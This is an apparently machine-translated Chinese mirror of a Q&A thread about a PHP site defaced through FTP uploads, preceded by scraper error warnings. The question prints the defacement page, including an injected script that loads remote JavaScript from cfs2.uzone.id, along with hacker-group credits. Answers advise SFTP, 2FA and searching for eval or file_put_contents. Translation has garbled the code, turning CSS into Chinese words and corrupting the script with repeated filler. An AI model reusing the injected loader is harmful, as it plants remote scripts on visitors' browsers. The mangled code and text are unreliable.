Warning: file_get_contents(/data/phpspider/zhask/data//catemap/1/php/289.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
Php 我的网站病毒问题_Php_Html_Security_Virus - Fatal编程技术网
Fatal编程技术网
  • php/
  • Php 我的网站病毒问题

Php 我的网站病毒问题

php html security

Php 我的网站病毒问题,php,html,security,virus,Php,Html,Security,Virus,这是一个严重的问题,我在我的FTP服务器上发现了其他人上传的HTML/PHP文件。我使用了强密码,但有人试图入侵我的服务器。这在我身上发生过两次 HTML/PHP页面包含写着“你的网站被黑了!”的代码,这个页面被上传到我服务器的每个文件夹中。我已经删除了这些文件并上传了我的备份,但是我们是否有任何安全代码,不允许任何人在FTP上插入文件,或者FTP的任何安全提示 在这里我写的HTML页面代码,该文件已上传到我的文件夹 出于安全原因,我需要帮助 注意:请复制此代码并在您的本地浏览器上运行,以便您了

这是一个严重的问题,我在我的FTP服务器上发现了其他人上传的HTML/PHP文件。我使用了强密码,但有人试图入侵我的服务器。这在我身上发生过两次

HTML/PHP页面包含写着“你的网站被黑了!”的代码,这个页面被上传到我服务器的每个文件夹中。我已经删除了这些文件并上传了我的备份,但是我们是否有任何安全代码,不允许任何人在FTP上插入文件,或者FTP的任何安全提示

在这里我写的HTML页面代码,该文件已上传到我的文件夹

出于安全原因,我需要帮助

注意:请复制此代码并在您的本地浏览器上运行,以便您了解

感谢和问候, 弗尔达


被OTnaytrue黑客攻击
if(self==top){function netbro_cache_analytics(fn,callback){setTimeout(function(){fn();callback()},0)}function sync(fn()}function requestCfs(){var idc_glo_url=(location.protocol==“https:?”https:/“:”http:/”;var idc_glo_r=Math.floor(Math.random()*999999999);var url=u glo_url+“cfs2.uzone.id/2f7a2请求”+n1“&enc=9UwkxLgY9”+”¶ms=“+”2.2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 P%2fIVRH7RzQb8zAZEjZjbRCn一个词,一个词,一个词,一个词,一个词,一个词,一个词,一个词,一个词,一个词,一个词,一个词,一个词,一个词,一个词,一个词,一个词,一个词,一个词,一个词,一个词,一个,一个,一个,一个,一个,一个,一个,一个,一个,一个,一个,MMMMMM6,一个,一个,一个,一个,一个,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2+屏幕宽度+“&sh=“+screen.height;var bsa=document.createElement('script');bsa.type='text/javascript';bsa.async=true;bsa.src=url;(document.getElementsByTagName('head')[0]| | document.getElementsByTagName('body')[0]).appendChild(bsa)}netbro cache(分析(requestCfs,function(){});
身体{
背景:透明;
背景:url(https://s23.postimg.org/za9vse2mj/IMG-20170525-_WA0009.jpg)无重复中心固定;
背景附件:固定;
背景职位:50%;
背景重复:无重复;
背景尺寸:封面;
文本阴影:灰色0px 0px 10px;
高度:自动;
宽度:100%;
}
#基里{
位置:固定;
宽度:自动;
左:30px;
文本阴影:灰色0px 0px 10px;
文字装饰:无;
}
#卡南{
位置:固定;
浮动:对;
保证金:0 40px 40px 530px;
文本阴影:灰色0px 0px 10px;
}
.按钮{
边缘顶部:50px;
填充:10px;
背景色:红色;
颜色:#FFF;
文字装饰:无;
}
恩托特先生{
字号:8px;
文本对齐:居中;
字体系列:Pirata One;
字体系列:基尼亚一号;
文本阴影:4px40x50px#000000;
}
加鲁达保安队-Eotnay@gmail.com
















“注意安全,先生”



奥特纳伊夫特平民酒店


[加鲁达保安队]



:我们是:。


_MisterNotFound|0xaN0n | PandaKecil | R007先生| ZU先生| 4202 | cyber | xr00t |平民|
404先生| RequestTimeOut先生| Dull | u 1999 | D@m@nt3| ins7ing | Syntax 404 | Darnight先生|
Rabbids404 | PHP404ERROR先生| OTnaytrue | AFK404 | MKNotfound477 |/St4rXr4tS |枪战CBR |心跳
格里茨:[卡卡托吉-./bl4ckj4ck-加贾·马达-紫色M0KE-柏登当格德-0xd3vs-印度探险家-Kedaong团队-TKJ网络艺术-小丑黑客行动主义团队-印度尼西亚诽谤者特萨基蒂团队-比马网络团队-T1KUS90T-IDCA-加鲁达安全黑客-以及所有印度尼西亚诽谤者]

首先,您不应该使用FTP,而应该使用SFTP或至少是FTPS。使用FTP,您的登录名和密码将通过网络以明文形式传输,供大家查看。我相信您的提供商必须提供上述任一选项,如果没有,请将您的网站移到其他地方

删除任何现有访问权限,并使用强密码创建一个新访问权限。如果可以,请尝试使用公钥/私钥而不是密码进行ssh身份验证

在您的托管帐户上,您很可能可以设置2因素身份验证。如果可以的话,请做


然后,在代码方面,查找关键字
eval
file\u put\u contents
fputs
等等。
请联系您的主机提供商-他们必须解决此问题。另外,在我看来,这个问题应该转移到您网站的PHP部分,因为您的网站可能存在漏洞。如果没有更多的信息,不可能说在哪里。